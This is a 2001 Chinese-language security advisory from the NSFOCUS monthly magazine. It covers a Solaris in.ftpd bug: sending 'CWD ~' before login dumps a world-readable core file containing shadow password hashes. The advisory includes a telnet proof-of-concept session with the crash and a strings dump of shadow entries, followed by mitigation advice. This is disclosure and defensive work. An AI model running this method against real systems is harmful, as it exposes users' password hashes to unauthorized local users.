首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第21期->最新漏洞
日期:2001-05-15
受影响的系统:
Solaris 2.6/2.5以及更低版本 (SPARC, x86)
描述:
--------------------------------------------------------------------------------
Solaris 的in.ftpd在用户登陆前接收到一个'CWD ~'请求时,会将用户
的home目录拷贝到一个缓冲区中。然而用户没有登陆前,这个home指针
为空。这将造成一个段访问错误发生,ftpd会在系统根目录下产生一个
core文件。这个core文件中可能包含shadow文件的部分内容。
缺省情况下,在Solaris 2.6下,core文件是任何人可读的。
所以普通用户可以获取部分或者全部的用户口令密文。
在Solaris 7/8下,缺省core文件是其他人不可读取得,所以不会造成
安全问题。
<*来源:Johnny Cyberpunk (johncybpk@gmx.net) *>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
warning3 (warning3@nsfocus.com)提供了下列测试方法:
[root@ /usr/sbin]> telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 sun26 FTP server (SunOS 5.6) ready.
user warning3
331 Password required for warning3.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
[root@ /usr/sbin]> ls -l /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
[root@ /usr/sbin]> strings /core|more
[...snip...]
lp:NP:6445::::::
P:64
eH::::
uucp:NP:6445:::
[...snip...]
--------------------------------------------------------------------------------
建议:
临时解决方法:
NSFOCUS建议您禁止产生core或者通过设置umask使core文件不可读
厂商补丁:
暂无。
版权所有,未经许可,不得转载